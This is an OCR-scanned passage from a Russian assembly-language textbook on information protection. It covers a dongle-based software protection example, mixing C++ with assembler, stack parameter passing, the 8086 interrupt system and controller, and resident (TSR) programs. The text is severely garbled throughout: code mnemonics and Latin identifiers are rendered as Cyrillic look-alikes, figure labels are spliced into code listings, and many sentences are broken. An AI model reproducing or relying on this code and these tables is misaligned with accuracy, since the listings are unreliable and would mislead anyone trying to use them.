ЕЕРЕРЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕНЕЕВЕЕЕЕЕЕЕЕРЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕЕВЕНЕЕЕНЕЕЕ 1 о45Ь 
Незащищенная версия программы с ПМ. ое 9х, а1 ; Вывод байта ракати 








1оор СпесквЗуоце2 











‚ МОРЕЬ Е1пу ; Чтение ПСП, расшифрование 3$ и формирование контрольной суммы 

. СОЕ поу сх, Мепб12е 

86 1008 поу 91, ОРЕЗЕТ 5фахе ’ 
Вед1п: пр МехЕ МехеВубеСтурсо: 
РатаСРгез ОВ '’Последовательность, реакция на которую’ оу ах, Вазейадх+1 

ОВ ’ сравнивается с кодом присутствия Ргезепсе’ , СпесквауТп: 1п а1, 9х ; Проверка 
0СР5112е = $ - ПабаСРгез Сезе а1, Вусеваут ; готовности ЭК 
Рата1п1 ОВ ‘’Инициализирующая последовательность" 32 СвесивЗу п ; к чтению 
101512е = $ - РабаТ{ 11 а], ы. ; Чтение очередного байта ПСП 
ВусевауТт = 018 хог {91], а1; Шифрование очередного байта 3ф 
Вусеваубие = 026 а98 Ь1, [91]; Формирование 
Ргезепсе ОИ ? ; промежуточного значения КС 
карЕбим ОИ ? 100 11с 91 
Мехг: хох Ъх, Бх ; В ВЬ будет формироваться КС, ? — МехкВукестурко 

; в ВН - код возврата 





сир Ь], В19ебиа ; КС расшифрованного 





























о ЕЁ—®— ООО 


# 
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; 3$ равна эталонной ? 

















912 С1еатМем 

дес ре) ; Код возврата 0 
; Защищаемый фрагмент 
; (в рабочем варианте программы должен быть зашифрован) 


Пристыковочный 
модуль 


Электронный 
КЛЮЧ 





Зфахге: пр Мех 1156г За аимент 
Меззаде ОВ 'Секретная информация !$*' программы 
Мех шзЕт: поу ап, 098 

поу 9х, ОРЕЗЕТ Меззаде 

10% 21 





Рис. 1.2.10. Структурная схема аппаратно-программного комплекса защиты ПО 
Мет517е = $ - ОЕРЗЕТ саге 

Мет517еС1г = $ - ОРЕЗЕТ Вед , 
;Очистка памяти \ 





С1еатМеп: с1а 
оу сх, Ме ес 
ХоЕ а1, а1 \ КС правильная? 
поу 41, ОРЕЗЕТ Ведп 

гер : зЕозЬ 







Проверка присутствия ЭК 
Передача управления 
на расшифрованный ЗФ 
























; 1} Для получения исходного текста защищенной версии программы 

; . необходимо: 

; а) выполнить трансляцию и компоновку вышеприведенного исходного 

; 6} запустить полученную программу в отладчике в пошаговом Чтение ПСП с выхода ЭК 
; режиме; 

; в) определить коды Ргезепсе, Вапебии и вид 3$ 

; в зашифрованном: виде; 


Расшифрование ЗФ 
Формирование КС 


Код возврата 1 


Рис. 1 
:2.11. Алгоритм работы пристыковочного модуля 


; г} внести изменения в соответствующих строках вышеприведенного 

; текста; при этом зашифрованный фрагмент может быть включен 

; в программу с помощью директив ОВ; 

; д) выполнить трансляцию и компоновку, после успешного проведения 
; которых будет получена защищенная версия программы. 

| ; 2) Проверить работоспособность защищенной версии программы можно 

й ; и при отсутствии ЭК. Для этого надо воспользоваться тем фактом, 
; что при обращении по адресам неиспользуемых портов ВВ. 

; считываемый код воспринимается как ЕЁВ. 


Очистка памяти 
Завершение программы 
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Задания для самостоятельной работы 


1) Предусмотреть автоматизацию процедуры получения защищенной версии програм. 
мы, например, задав два режима запуска программы: с ключом /СКУРТО - превра- 
шение "полуфабриката" в рабочую защишенную версию программы, без ключа - 
рабочий режим. 


2) Предусмотреть выход из циклов ожидания готовности ЭК при превышении заданного 
времени ожидания. 


3) Защитить код ПМ от статического и динамического исследования. 


и 


4) Дополнить перечень функций ЭК за счет включения функций, обеспечивающих "пла- 


вающий" протокол взаимодействия с ключом. 


5) Разработать программу-эмулятор ЭК — обработчик прерывания ПМТ 608. 


6) Отладить программу с ПМ с использованием разработанного эмулятора. 


1243. — Смешанное программирование. 


Связь с программами на языке С++ 


Практика программирования показывает, что большинство программ -тоатят до 90% 
времени своей работы на выполнение 10% своих операторов, которые образуют так на- 
зываемый критический код программы. Во многих случаях реализация этих операторов 
на языке Ассемблера позволяет повысить быстродействие программы. В то же время 
реализация оставшихся 90 % операторов на Ассемблере очень часто не дает ощутимых 
результатов. 

Можно выделить и другие причины подключения модулей, написанных на Ассембле- 
ре, к программам, написанным на языках высокого уровня, например Си++: 
№ доступ к самым низким уровням оборудования компьютера для более эффективного 

использования его возможностей; 


№ реализация функций защиты информации. 


Существуют два способа смешанного программирования: использование встроенных 
операторов и использование внешних функций. Предпочтение следует отдать второму 
подходу, использование которого имеет следующие преимущества: 

Ш позволяет наиболее полно реализовать возможности Ассемблера; 

Ш сохраняет высокую степень переносимости программ на СиС++; 

№ облегчает отладку из-за возможности автономного тестирования ассемблерных модулей; 
|-- 


позволяет использовать внешние функции и в других программах, в том числе напи` 


санных на других языках. 


льиыа А ишшый из бшащьиньь а 
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При разработке ассемблерных модулей, вызываемых из программ, написанных на С 
и С++, следует учитывать 
и соглашения, принятые в Си С++; 
и размер переменных Си С++; 
и особенности передачи параметров. 


Особенностями С и С++ является чувствительность к строчным и прописным буквам 
Одной из особенностей С++ является процесс обработки имен функций таким образом, 
чтобы в них сохранялась информация о типах аргументов. Одним из соглашений с 
иС++ является использование знака подчеркивания "_". Компиляторы автоматически 
добавляют этот символ к именам всех внешних функций и общедоступных переменных. 

Примеры 
// ==== Фрагмент программы С++, 


цуазпргос - функция, вызываемая из С+ 
цусрргос - функция, вызываемая 





// Прототипы функций. 


// "С" - отключение обработки имен - функции пуазиргос и пусррогос 
// будут иметь имена, соответствующие соглашениям, принятым в С 
ехбехп "С" уо19 пуазпргос (); | 

ехсегп "С" уо14 пусрюргос (); 


// объявление данных в ассемблерном модуле 
ехфегп 1пЕ тууа1е1; 

Ш Объявление глобальных данных 
116 пууа11е2; 


па{п () 


{ 


|| Присвоение значе 
ния данным ассемблерного м 
пууа]1е1 = 2605; у о 


/ Присвоение значения глобальным данным 
пуча\ше? = 357; 


/! Вызов функции ассемблеюного модуля 
пуазиютгос (); 
тегохи 0; 
} 
И. | 
Функция, вызываемая из асКемблерного модуля 


тет "С" уо19 пусррргос (}; 
| пусрргос () 


. МОБЕЬ эпа11 
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; Данные, объявленные в модуле С++ 
ЕХТАМ  мууа}ае2: МОВО 
; Данные, объявленные в ассемблерном модуле 

_вууа1че ри 205 

; Разрешение доступа к данным из модуля С++ 
РИВЬТС _пучае 


. СООЕ 
; Функция в модуле С++ 
ЕХТАМ _пусррргос 


; Функция в ассемблерном модуле 
РОВЬТС _муазтрос 


_пуазиргос РВОС 
поу _тууа1ае1, сх 
ПоУ ах, _тууа1ае2 } 


; Вызов функции в модуле С++ 
са11 _тусррргос 


_туазиргос ЕМОР 


При вызове переменных С++ из Ассемблера и наоборот необходимо учитывать их разме. 
В табл. 1.3 отражено соответствие между различными типами данных С++ и Ассемблерь 
а также регистрами процессора, в которых возвращаются данные при выходе из функции. 


Таблица 1. 3. Типы переменных С+ + ч Ассемблер 
Типы данных Типы данных 
(С++ Ассемблера 
Упятдпед сваг ВУТЕ 
СВаг 


Упядпед $По 
Во“ 
Уп$1дпей 1пЕ 
1 
Епим 
Меаг * 
Уп$1дпед [0опд 
1019 

Раг * 
















Разрядность, бит Регистры, нспользуемые 


для возврата данных 






















я 
Передача параметров в процедуру выполняется С++ через стек. Перед вызовом фуне 
передаваемые параметры загружаются в стек в порядке, обратном их записи (рис. 1.2.12). 













имеры (см. рус. 1.2.12, а, 6) 
зов ФУНКЦИИ На С Еее 





‚ === ВЫ 
= я ргос (пуага1, муагч2, 22, 10} 
__- вызов ФУНКЦИИ на Ассемблере ========е=е=еняенняненяненене==Е= 
1 поУ ах, 
риёН ах 
ризВ ах, 22 
ризй ах 


ризй МОВР РТК пмуага2 
ризВ МОВО РТВ _муага1 
са] 1 МЕАВ РТВ мургос 
а34 зр, 8 ; Формируем в 5Р значение, которое было 
; до вызова мургос 
„==== Процедура _мУургос яя яя яянянянянн=ння==- 
' . МОБЕГ зта11 

. СОВЕ 


РОВЬТС мургос 


пургос РВОС 
- ри5П Бр 
оу Бр, $р 
; Теперь к параметрам можно обращаться, 
; используя ВР: [Ър+2] - адрес возврата, 
; [5р+4] = ага], [5р+6] = ага2, 
; [5+8] = 22, [р+101 = 109 
поу сх, [Ьр+4] ; сх = ага] 
ааа сх, [6р+8] ; сх = ага1+22 
рор Бр 
теё 
_лургос ЕМОР 
ЕМР 


В асс 
Е емолерном модуле можно использовать размещенные в стеке локальные перемен- 
зе ры существуют только во время выполнения функции. Стековая область резерви- 
(6) 
кальные переменные при запуске функции, а перед ее завершением очищается. 





= Автом 
атическое ини стеке локальных переменных 





пурте ао оЗоВанием директивы ТОСАЁБ. =========Е=ЕЕЕЕЕЕЕБЕЕЕНЕЕЕЕЕ 
БОСАГ ]оса]таз: ВУТЕ: 256, 
]оса]уаг: МОВО = пууаг$1те 
; тууаг$1те - общее количество 
; байтов, необходимое для 
; размещения локальных переменных 


ру5В Бр 
поу Бр, зр 
5ар 


зр, мууагз12е 
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хог а1, а1 м" . 
оу сх, }оса]уаг 
}еа Ьх, }осапаз 
пехеру{е: поУ ВУТЕ РТА [Ъх], а1 | 
12с а} ! 
12с Ьх 
бор пенье ОХ 
ее в 
вы 
В заключение рассмотрим законченную программу. 
Пример (см. рис. 1.2.12, г) | 
ка 
// ==== Программа шифрования строки байтов === Вершина сте Вершина стека 
// ==== сгур®о.срр - модуль С++ в=яваяяянаняяянанння===========5===2 
Е # 1пс1аде <$%Е41о.1> р 
| # 1рс1аде <5%11719.Н> | а 6 
ехфеегп "С" уо19 БаЁскурео (ип519леб сраг ар *пПурчЕ, 
| 106 раЁзуте, сраг Кеу}; о \ 
| сваг *тузёг = "Секретная информация"; ВР - 258 
| пе пали {} 1оса!таз [0} 
| ре1рЕЕ ("ВеЁоге епсгур оп: %5\п", тузег); $ +256 - ВР-4 
раЕсгурео (тузех, зегфеп(тузег), "б"); 258 Досайтаз [255] в 
РЕПЕЕ (“АЁбег епсгур ол: %3\п", музёг); те -2 
| тетата 0; ре ы 
м + ВР+2 
И === РаЕсгурсо. ат - ассемблерный МОДУЛЬ. ==ЕЕ=ЕЕ=ЕЕЕЕНЕЕЕЕНЕЕЕЕЕЕЕЕЕЕ 
| . МОРЕЬ зта}1 
| . СОРЕ 
| РОВЬГС _БаЕЁсгурхо 
| _раЁсгурео РВОС 
| ; Директива АВС автоматически формирует правильное смещение Вершина стека 
| ; в стеке для перечисленных параметров 
ый АВС адагЬаЕ: ОМОВО, БаЁз1те: МОВО, Кеу: ВУТЕ 
| рузв Бр в г 
И поу Бр, зр Ри | 
й поу сх, БаЁ512е ых 2.12. Использование стека: 
ы 9сх2 оцсоЁргос —849 стека перед началом выполнения функции _тургос; 
роз 55 “а м - в Сы стека после выполнения команд ризй Бр и тоу Бр, р функции _тургос; 
м м у и . а ление стека под локальные переменные; 
- Вид ст 
тер 05 ' А 9 стека после выполнения команд ризН Бр и тоу Бр, р функции _Бубсгурю 
. сс 
рор 91 ез Бас мблированне и компоновка: 
НИ оцеоЁргос: РоР р СтУрво рр Бисгурьо .азш 
И ге Кома " 
_Бабсгурео ЕМОР  аещирени сначала компилирует СКУРТО.СРР в СКУРТО.ОВУ, затем, обнаружив 
ЕМО . ^ 


АОИ ® .АЗМ, компилятор вызывает ТАЗМ.ЕХЕ, чтобы ассемблировать 
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ВОЕСКУРТО.А$М в ВОЕСВУРТО.ОВУ. Затем компилятор вызывает ТЕЛМК.ЕХЕ для 
я модулей с объектными кодами в СКУРТО.ЕХЕ. Данный метод подходит, 


объединени 
ежит небольшое количество модулей. 


если компиляции и ассемблированию подл 


Раздельное ассемблированне и компоновка: 


фазм /01 Баёсгурео 


Бес -с сгурЕо 

+14шк а: \5с45\14Ъ\с05 сгурео Баестурео, шусгур®о,, а: \Ьс45\Ъ\с8 
Данный метод используется при ассемблировании и компоновке большого количест- 

ва модулей. Опция /[п1 включает р описных символов, как это 


азличение строчных и пр 
принято в Си С++. Опция -с означает "только компилировать", вызывая создание фай- 
ла типа .ОВУ, но не компоновку программы. Первый параметр после ТИМК специфици. 
рует файл объектного кода для соответствующей модели памяти, второй параметр — пол. 
лежащие компоновке файлы „ОВ, третий параметр 


_ имя конечного файла, четвертый 
параметр — необязательный, пятым параметром специфицируется рабочая библиотека. 
\ 


Упрощенный метод компоновки: 


фазм /п1 БаЁсгурео 


Ъес -с сгурбо 
Бес -п5, сгурео.0Ъ Биесгурео. 95 


Опция -пз определяет модель памяти (ЗМАМ.). 


13. Система прерываний ВМРС 


1.3.1. — Способы организаций ввода-вывода информации 


Существуют следующие способы организации ввода-вывода: 
и программно-управляемый ВВ; 
м ВВ по прерываниям, 
Ш прямой доступ к памят 
Ви ВВ по прерываниям основываюте 
при этом данные от памяти к портам ВВ и обратно передаются через регистры 
В режиме ОМА выполняется последовательность команд, заставляющая контроллер 
передать совокупность байтов или слов из порта ВВ в память или в обратном направлен 
Программно-управляемый ВВ предполагает постоянный опрос разрядов готов 
регистров состояний УВВ (см. раздел 1.2.11). Хотя реализация програ 
управляемого ВВ чрезвычайно проста, она связана со значительными потерями В 


на ожидание активного состояния ИБ. При вводе-выводе по прерываниям отпадает 
ходимость в постоянной проверке рег 


и ОМА (Оше Метоту Ассез$). 


Программный В я на передаче байтов или 


истра состояний интерфейсного блока: по 


АИ 


6108 


/ 
| 


ме 


реме* 
не 


след! 





сам посылает в ЦП сигнал з 

ой процессор или готов А на прерывание 1КО, когда он имеет данн 

сализуется специальной мать данные из ЦП. Операция ввода-вь ые для ввода 
м -ВЫВ 
В системе И У рой, называемой обработчиком пр ода в этом случае 
> ной на рис 1.1.1 ерывания 
. 1.1.1, существуют и др ° 

угие ситуации, ког. 

› когда процессор 


екрашает выполнение текущей прогр 
пр аммы И переходит на об П 
1 служивание посл у ивше- 


1.3.2. 


Существует два типа й: 
ео а прерываний: аппаратные и программные (рис. 1.3.1). П 
ла называн т асинхронными, так как они происходят в с чайные 
т сум аня а ОнНыми так как они ВОЗНИК 
м стучае, котла пр ения программы 
ы р р ононь похожи на команды вызова  Подпрогамм ее о ово, 
темным ресурсам ПК: процедурам пе, не прерывания, это механизм обращения к сис 
И а болерационной системы 2РО$, расположенным пе. 
Й системы ввода-вывода В10$,  "аходящимс» 


в постоянной памяти. Э 
. Эти процедуры 
я ры реализуют функции д 
СВО ции ввода-вывода дл; ндартнь 
УВВ, выделяют и бождают память, работают с системными часами а ртных 
ит. п. 


Прерывания 
Аппара НЫ 
е (ас. 
( инхронные) Про раммные (синхронные) 
ние 
ренние 


Немаскируемые 
Маскируемые 


Рис 1 
ы Зл. 
Классификация прерываний 
‘ \ппарат с 
ное 
) прерывание уть 
| процесс, иниции уем р 
Е , р ый сигналом (запросом прерыва- 
еме произошло некое событие (наприме 

к торь И сообщает ЦП что в сист р, нажата 


ища на 
клавиатуре 
пп туре), требующее е 
аратные преры го внимания. 


ае си. 
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деления, и прерывание пошаговой работы, возникающее после выполнения кажд, 
команды при установленном флаге ТЕ. 

Внешние аппаратные прерывания делятся на немаскируемые и маскируемые. Запр 
немаскируемого прерывания, поступающий на вход ММТ процессора, должен бы 
обслужен сразу. Он обычно сообщает о чрезвычайной ситуации, например, об обна. 
жении ошибки в памяти или временном понижении напряжения питания. 

Немаскируемые прерывания поступают на вход ПМТ процессора от УВВ, требующих ‹. 
служивания. Эти прерывания можно запрещать или разрешать тремя различными способами, 
Ш сбрасывая или устанавливая соответствующие биты ПУТЕ (Пщеггир! ЕпаЫе) регистров 

состояний интерфейсных блоков; ‹ 

Ш устанавливая или сбрасывая соответствующие биты регистра маски контроллера пре. 
рываний; 
Ш выполняя команды СЫ (Сеаг Ниеггире) или ЭТТ ($её иеггир@, соответственно сбра. 

сывающие или устанавливающие флаг [Е. 


Прерывания от стандартных УВВ желательно запрещать на очень короткие проме. 
жутки времени, необходимые для выполнения критических участков программы. 


1.3.3. — Последовательность прерываний 


В процессоре 8086 в общей сложности предусмотрено 256 номеров прерыва 
Вектора прерываний (ВП), т. е. полные адреса соответствующих обработчиков, хра 
в таблице векторов прерываний, которая занимает начало оперативной памяти (ад 
000008 ... ООЗЕЕВ), как показано на рис. 1.3.2. В два старших байта 4-байтовой яче 
таблицы записывается сегментный адрес обработчика прерываний, в два младших байт 
— относительный адрес обработчика прерываний. Из рисунка видно, что вектор прерыв 
ния с номером 0, располагается в памяти, начиная с адреса 0, вектор прерывания с номе 
ром 1, располагается в памяти, начиная с адреса 4, и т. д. Вектор прерывания с номером 
М, располагается в памяти, начиная с адреса 4. 

Независимо от источника прерывания (внутренние схемы ЦП, команда ПУТ №, сигн 
лы [МТ или ММ! на одноименных входах процессора) последовательность прерыванй 
выполняется одинаково. При инициировании прерывания с номером № процессор после 
довательно выполняет следующие действия: 

Ш сохраняет в стеке содержимое регистров Е, С$ и ГР, т. е. информацию, необходим;® 
для будущего корректного возобновления прерванной программы; 
Ш загружает в С$ и ТР адрес обработчика прерывания с номером №, который хранит" 

в ячейке таблицы ВП с адресом 4№, осуществляя тем самым переход на програм" 

обслуживания прерывания; й 


к и 
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89 
и по команде 1ВЕТ, которой обычно завершается об 


обратные действия работчик прерывания, выполняют- 
ся 


_ из стека извлекаются сохраненные там значения [Р, СЗиЕ 
2, 
где про-! 


в результате чего происходит возврат в прерванную программу в ту точку 
изошло прерывание. ) 








Е 


Ри 
с. 1.3.2. Последовательность рывания с номером № 


Мно - 
Вий ас вектора прерываний зарезервированы для выполнения определенных дейст- 
при а ь таких векторов заполняется адресами системных обработчиков прерываний 

Узке ПК. На рис. 1.3.3 показаны некоторые из таких векторов прерываний. 





д ЗИ 
















































































90 Ассемблер в задачах защиты! информаци. 


Деление на нуль 

Пошаговая работа 

Немаскируемое прерывание (ММТ) 
Точка останова (команда 1МТ) 
Переполнение (команда тмто) 


ИИ 


Нажатие клавиши РИ ст 





ВП 081 


ВП 09Н 
ВПОВН 


Прерывание от таймера 
Прерывание от клавиатуры 
Прерывание от последовательного порта С0М2 





Прерывание от последовательного порта С0М1 
Прерывание от параллельного порта +РТ2 
—— 


Прерывание от гибкого диска 
Прерывание от параллельного порта (РТ 


Драйвер экрана 8105 


Драйвер жесткого диска 8105 
Драйвер В5-232 8105 


Драйвер клавиатуры 810$ 
Драйвер принтера 8105 


Диспетчер 005 

Прерывание при нажатии СС 

Дайвер мыши | 

Свободные вектора программных прерываний 
Прерывание от системных часов 

ободные вектора внешних аппаратных прерываний 


Прерывание от жесткого диска 


Рис. 1.3.3. Вектора некоторых прерываний 


1.3.4. — Внешние аппаратные прерывания 


Запросы /КО внешних аппаратных прерываний, возникающие на выходах требующе- 
го обслуживания УВВ, поступают на вход прерывания ПМТ ЦП через контроллер преры- 
ваний (КПр). КПр состоит из двух однотипных контроллеров, образующих структуру 
"ведущий-ведомый", как показано на рис. 1.3.4 . В состав каждого контроллера (рис 
1.3.5) входят: регистр запросов прерываний 1ВК, в котором фиксируются факты прихода 
сигналов /КО; регистр обслуживаемых запросов 138, в котором фиксируются запросы: 
находящиеся в стадии обслуживания; регистр маски прерываний ИМК и регистр базового 


номера прерывания. 





\ _ | 
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Убывание приоритетов 


Рис. 1.3.4, Организация внешних аппаратных прерываний в ВМ РС 
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Рис. 1 
3.5. Внутренняя структура контроллера прерываний 
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Обработчик 
прерывания 












ЦП > КПр 
КПр > ЦП 

Номер 
287 


О8В ... ОР, ТОВ ... 778 


Рис. 1.3.6. Временная дуаграмма последовательности внешнего аппаратного прерывания 


х 


1) КПр. Запросы 1ВО поступают на входы КПр и вызывают установку соответствующих 
разрядов регистра запросов прерывания. 

2) КПр. Если данные прерывания не замаскированы, т. е соответствующие разряды регистра 
маски прерываний сброшены, единичные сигналы с выхода регистра запросов прерыва- 
ний поступают на входы схемы анализа приоритетов. 

3) КПр. Схема приоритетов формирует сигнал ПМТ, поступающий на одноименный вход ЦП. 
"Самая приоритетная" | с выхода ТВК проходит далее на вход соответствующего разряда 
регистра 15К. 3-разрядный код номера входа регистра ВВ, на который пришел самый 
приоритетный запрос, суммируется с содержимым регистра базового номера прерываний 
(08 для ведущего и ОАО для ведомого КПр). На выходе сумматора в результате форми: 
руется 8-разрядный код номера М соответствующего прерывания. 

4) ЦП. После выполнения текущей команды процессор обнаруживает высокий уровень сиг 
нала на входе ПМТ. Если 1 = 1, т.е. прерывания разрешены, процессор по линии МТА 


формирует два сигнала Т№ТА 1 и ГМТА 2 , которые поступают в контроллер прерываний. 





5) КПр. Сигнал ТМ№ТА 1, поступив в КПр, переводит прерывание с рассматриваемым 
номером из разряда запрашиваемых в разряд обслуживаемых, сбрасывая соответст” 
вующий разряд регистра [ВК и устанавливая соответствующий разряд регистра 158. 
Функцией каждой единицы в регистре 15К является блокировка всех прерываний того 
же и более низкого уровня приоритета. 


—_— 


6) КПр. Сигнал ТМ№ТА 2. является для КПр сигналом чтения, по которому контроллер в*" 





ж 


дает на линии шины данных РВ7 ... ОВО сформированный им ранее номер прерываний 
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интим ииме ними ними «покр ни папа ава в я ро вии н и привваоаньнье 93 


7) ЦП. Процессор читает номер прерывания №, сохраняет в стеке содержимое регис 

гов, сбрасывает флаг ПЕ, сохраняет в стеке адрес возврата (С: [Р) обращается ры 
таблицы векторов с адресом АМ, считанный из нее ВП записывает в С$: ГР, об , а 
тем самым передачу управления на начало обработчика прерывания с номером м ечивая 


8) ОП. Обработчик прерывания в процессе своей работы должен обеспечить сброс сиг- 


нала 1ВО, сброс соответствующей е 
) му 1 в регистре 13К. 
управление прерванной программе. регистр и по команде 1ВЕТ вернуть 


ВЕЗЕТ 






Чтение адреса возврата 
из стека: стек-(65: [Р) 


Подтверждение прерывания 
Другое ТИТА\: установка бита ТВ, 


сброс бита ТЕК 
ПИТА? 
и Формирование в (65: ТР) Сохран 
дреса следующей команды ? Вы флагов: 
е 
Сброс флага прерываний 
1Е=0 
1 
Сохранение адреса возврата: 
, (55: ТР)» стек 
Чтение адреса обработчика: 
ТВП-=(55: [Р) 








Рис. 1 
‚ 1,3.7. 
Последовательность внешнего аппаратного прерывания 
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бенности создания обработчиков прерывания: 
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.74 о ллаиининииенининиинииининининининии пин ее, 


Ш процедура обработчика всегда имеет атрибут ЕАК; 


Ш сегментные регистры 0$, Е$ и $$ после прерывания сохраняют значения, которые 
они имели в прерванной программе; 


ш обработчик прерываний "наследует" стек прерванной программы; 

Ш учитывая, что аппаратные прерывания могут возникать в произвольные моменты 
времени, после входа в обработчик иеобходимо сохранять содержимое всех исполь- 
зуемых регистров, а перед выходом из обработчика — восстанавливать его. 


На рис. 1.3.8 показана обобщенная структура обработчика внешних аппаратных преры- 
ваний. Если в обработчике отсутствует команда УТ, механизм вложенных прерываний 
будет заблокирован. Прерывания будут вновь разрешены только после выполнения коман- 
ды ВЕТ, возвращающей из стека сохраненное состояние регистра Е с установленным фла- 
гом ТЕ. Чтобы не задерживать обработку прерываний от приоритетных устройств обычно 
в качестве первой команды обработчика используют команду УТУ. 


Запрещены 
все вложенные 


тт прерывания 


Разрешены вложенные 
прерывания с более 


высоким приоритетом 
БОТ м приор 





Разрешены 
все вложенные БОТ 
ТВЕТ прерывания ТВЕТ 
а . 6 в 


Рис. 1.3.8. Структура обработчика внешнего аппаратного прерывания: 
а- обобщенная структура, 
б — обработчик с заблокированным механизмом вложенных прерываний, 
в — обработчик с включенным механизмом вложенных прерываний 


В каждом конретном случае в более детальном виде структура обработчика прерыв 
ния зависит от следующих факторов: 


Ш какое прерывание — программное или аппаратное, 

ш какой обработчик — резидентный или транзитный; 

Ш какой вектор прерывания — свободный или используемый системой; 
и 


если ВП используется системой, прикладной обработчик заменяет системный или Ж 
“сцепляется" с ним; 


№ вслучае "сцепления" прикладной обработчик работает до системного или после, 
ш используются ли в теле обработчика системные вызовы 20$ или В1О$5. 
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Примеры | 
уявяе Приказ ЕОТ для ведущего КПр. ================================= 
поу а1, 20Н ; Посылка кода 201 
оп 201, а1 ; в порт 20} ведущего КИр 
;==== Приказ ЕОТ для ведомого КПр. ===============================55 
оу а}, 20. ; Посылка кода 201 
оч 201, а1 ; в порт 201 ведущего и 
оч ОАОН, а1; в порт ОАОр ведомого КПр 
дня Запрет прерывания от клавиатуры (1801). =ЕЕ=ЕЕЕЕЕЕЕЮЕНЕЕЕЕЯЯЯЫ 
п а}, 21н ; Чтение текущей маски 
от а1, 02н ; Устанавливаем разряд 1 
ОЧ 211, а} ; Запись в регистр 1МВ 
;==== Разрешение прерывания от клавиатуры (1801). 
10 а], 21. ; Чтение текущей маски 
апа а1, ОЕОЬ; Сбрасываем разряд 1 
оц 21н, а1 ; Запись в регистр 1МВ 


;==== 081..0ЕВ с заблокированным механизмом вложенных прерываний. === 
МуБап@]ет1: 


поУ а1, 201 
ом 201, а1 
1геё 


1=Е== 


Обработчик прерывания с номером из диапазона 081..0ЕВ 


с включенным механизмом вложенных прерываний. ========== 
МуНапа 1 ет 2; 





1==== 


351 
с11 
ПоУ а}, 208 
оц 20}, а} 
1теё 


Структуры прикладных ОП, взаимодействующих с системными. ===== 


Прикладная обработка выполняется после системной ============= 
О 9тпе 8] 5 


у=Е== 


; Ячейка для хранения "старого" 
; используемого системой ВП 


Ментпе. 
пе: ; Точка входа в прикладной ОП 


разНЕ 
са1]1 О\ОВО РТВ сз: 01411 


; После выполнения этих команд на вершине 
; стека три верхних слова имеют тот же 

; вид, что и при обычном входе в системную 
; процедуру ОП, поэтому команда ТВЕТ 


; вернет управление в нашу программу 
;Прикладная обработка 
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;===== Прикладная обработка выполняется до системной =============== 


О1атте Ор ? 


; Прикладная обработка 


пр ОИОВО РТК сз: 019106 





; Команда ТВЕТ не нужна, она 
; есть в системном обработчике 
;==== Определение собственного стека в обработчике прерывания. ===== 
АТОМ 
Мубеаск ОВ 2008 БОР (?} 
; Локальный стек объемом 256 слов 
ЕпаОЕ$аск = $ ; Конец области стека 
0145Р 19) ? ; Ячейки для хранения 
01955 №9) ? ; "старого" содержимого 55 и $Р 
МуНапа] ег: 
поУ сз; 01955, $55 ; Сохранение "старого" 
поу с$; 0195$Р, зр ; содержимого 5$ и 5Р 
разв сз 
рор 55 
Ме зр, ОРЕЗЕТ Епа0ОЁЕ5аск-2 
; 55; 5Р указывают на , 
, ; последнее слово в стеке 
поУ 55, с3: 01955 ; Восстановление 55 
поу зр, сз: 0195Р ри 5$Р перед возвратом 
; из обработчика 
ттее 
; Примечания. 


; 1) Последовательности команд, изменяюших содержимое $55: 5Р, 

; не произвольны; необходимо предотвратить возможность прерывания 
; во время выполнения этих действий, что может привести к 

; разрушению системы. 

; 2) В, вышеприведенном примере это обеспечивается за счет 

; использования того факта, что ЦП не анализирует сигнал на входе 
; ТМТ при выполнении команд МОУ и РОР, изменяющих содержимое 

; сегментного регистра. 

; 3) Директива АГТСМ гарантирует, что стек начнется 

В с границы слова, т.е, с четного адреса. 
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зва 1. Основы программирования на`Ассемблере 1ВМ РС 9 


1.3.5. — Резидентные программы 


Большой класс программ, например, драйверы устройств, программы шифровани 

изащиты данных и многие другие, должны постоянно находиться в памяти и мгновенн 
еагировать на запросы пользователя или на какие-либо события, происходящие в сис 

теме. Такие программы носят название резидентных или Т5К — Тепитайе ап@ $а 
рез4епе. Сделать резидентной можно как программу типа .ЕХЕ, так и программу тип 
СОМ, однако, учитывая, что резидентная программа должна быть максимально ком 
пактной, обычно в качестве резидентных используют программы типа .СОМ. 

Резидентные программы обычно состоят из двух частей — установочной и резидент 
ной. При первом вызове Т5К-программы она загружается в память целиком и управле 
ние передается секции установки, которая заполняет или модифицирует вектора прерь 
ваний, настраивает программу на конкретные условия работы, анализируя переданные е 
параметры и с помощью либо прерывания 211 с функцией 31, либо прерывания 27 
завершает программу, оставляя в памяти ее резидентную часть, после чего система пер. 
ходит в исходное состояние. 

Для того чтобы активизировать резидентную программу, ей надо как-то передал 
управление и, в случае необходимости, параметры. Запустить резидентную программ 
можно тремя способами: 
№ вызвать ее операторум САШ, как подпрограмму; 

и использовать механизм аппаратных прерываний; 


Ш использовать механизм программных прерываний. 


Кроме того, специально для взаимодействия с ТЗК-программами предусмотрее 
мультиплексное прерывание 2ЕВ. 

Типичная структура резидентной программы на языке ассемблера 1ВМ РС показа! 
на рис. 1.3.9, из которого видно, что ТЗВ-программа имеет как минимум две точки вх: 
да. Реальные ТВ-программы перехватывают целый ряд аппаратных и программнь 
прерываний и поэтому имеют не одну точку входа активизации, а несколько. 






РР 





Точка входа 


при запуске Эр [п$6а}1 






о. Резидентная часть 
Точка входа МуНапает : 
при активизации 


по прерыванию 4хеё 











Тп156а11: 


Отбрасывается после установки 


поу Чх, ОРЕРЗЕТ [п$%а11 
416 276 


Рис. 1.3.9. Структура Т5В-программы 
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Для обращения к резидентной программе из транзитной можно использовать: 

м область межзадачных связей, являющуюся частью области данных В[О$ (адреса 401: 
ЕОН...40Ъ: РЕВ); 

Ш свободные или уже занятые системой вектора прерываний (ВП). 


Если ТЗ$К-программа запускается по нажатию клавиши, возникает проблема взаимо- 
действия с системным обработчиком прерываний от клавиатуры, а также другими про- 
граммами, перехватывающими прерывание о9Н. 

Для взаимодействия с резидентными программами в системе предусмотрено специаль- 
ное прерывание 2Е1. Перед вызовом ПМТ 2ЕЬ в регистр АН следует поместить номер функ- 
ции (функции пользователя — 0СОН...ОЕЕЪ), а в регистр А\, — номер подфункции. Прерыва- 
ние 2ЕВ используется чаще всего для защиты от повторной установки и передачи уже 
загруженной программе приказа на выгрузку. Для того чтобы ТЗК-программа реагировала 
на прерывание 2Е6, в нее следует включить обработчик функций этого прерывания. 

Наиболее простой способ выгрузки Т$В-программы из памяти — освобождение бло- 
ков памяти, занимаемых программой и ее окружением с помощью функции 491 преры- 
